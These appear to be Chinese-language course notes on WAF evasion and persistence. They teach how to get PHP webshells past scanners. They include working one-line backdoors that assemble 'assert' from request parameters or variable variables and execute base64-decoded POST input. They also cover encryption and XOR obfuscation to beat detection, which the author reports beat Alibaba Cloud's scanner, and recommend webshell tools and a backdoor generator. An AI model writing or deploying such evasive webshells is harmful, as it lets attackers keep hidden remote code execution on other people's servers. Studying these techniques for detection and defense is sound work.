WAF攻防-权限控制&代码免杀&异或运算&变量覆盖&混淆加密&传参
目录
WAF攻防-权限控制&代码免杀&异或运算&变量覆盖&混淆加密&传参
#知识点:
1、脚本后门基础&原理
2、脚本后门查杀绕过机制
3、权限维持-覆盖&传参&加密&异或等
代码块&传参数据&工具指纹等(表面&行为)
1、代码表面层免杀-ASP&PHP&JSP&ASPX等
2、工具行为层免杀-菜刀&蚁剑&冰蝎&哥斯拉等
按顺序来说,上节课讲了信息搜集,这节课应该讲漏洞发现了,但是小迪课没备好,所以这里先说权限控制了。
基础-脚本后门控制原理-代码解释
对比工具代码-菜刀&蚁剑&冰蝎&哥斯拉等
相对来说小迪不推荐,菜刀和蚁剑,菜刀一直没更新,蚁剑相当于是菜刀的升级版,多了一些插件,但是小迪说用的总出毛病。这里推荐冰蝎和哥斯拉。现在又出来个天蝎,就推荐这三个,冰蝎、哥斯拉、天蝎。
我们上传的后门的时候需要解决两个问题,第一个就是能上传,第二个就是上传之后能够用这些工具能够连接上
原理-脚本后门查杀机制-函数&行为
对比WAF规则-函数匹配&工具指纹等
代码-脚本后门免杀变异-覆盖&传参
这里我们说两个免杀的方法,一个是传参带入,一个是变量覆盖。利用这两个可以绕过,但不是说一定能绕过,如果还是被检测出来了,那也没办法
1.php 传参带入
php
$a=$_GET['a'];
$aa=$a.'ert';
$aa(base64_decode($_POST['x']));
?>
?a=ass
x=cGhwaW5mbygpOw==
正常的一句话木马肯定是能被检测出来的,这里使用传参绕过正则表达式。但是这个我上传到阿里云的webshell检测还是被检测出来后门了。
但是当我把$_POST这个关键字删除之后就会发现不报错了,那可能是因为阿里云的检测引擎检测这个东西。
2.php 变量覆盖
php
$a='b';
$b='assert';
$$a(base64_decode($_POST['x']));
?>
x=cGhwaW5mbygpOw==
这个变量覆盖我觉得和传参带入没啥区别,但也是一种方法,这个毫无疑问因为有$_POST这个关键字,所以一样检测是后们。但是每个地方检测的都不太一样,所以还是可以试一试。我们下面会说异或算法,其实可以用异或算法把$_POST这个关键字给替换掉,这是我个人的猜想,不知道对不对。
代码-脚本后门免杀变异-异或&加密
3.php 加密变异
这个就是说通过一些算法把你的后门代码给加密,就比如这里我用第一个平台去加密后门
这里将1.php去加密
加密完之后可以说是根本看不懂,但是这个却可以绕过阿里云的webshell检测。那你可能会问,这个代码经过加密还能正常访问吗?
是可以访问的,因为这里面是由解密的函数的,当你访问的时候,数据还是会先解密的,只不过你看不懂这个代码罢了。
4.php 异或运算
这个异或运算就是可以把代码进行一个转换,就比如下面这个代码,('!'^'@') 就是代表的就是a,那么我们就可以把后门代码的每一个字符通过异或算法给转换一下,这个异或运算在CTF中比较多一点。
这个代码就可以生成各个字符的异或。还是很不错的。
拓展-脚本后门脚本类型-JSP&ASPX
5.php 脚本生成器
Webshell-venom
ASP PHP JSP ASPX
这个就是各个语言的脚本生成器了,这里就比如php的
可以看到这个不仅能直接生成一句话后门,还可以对你的后门进行免杀处理,还是很不错的。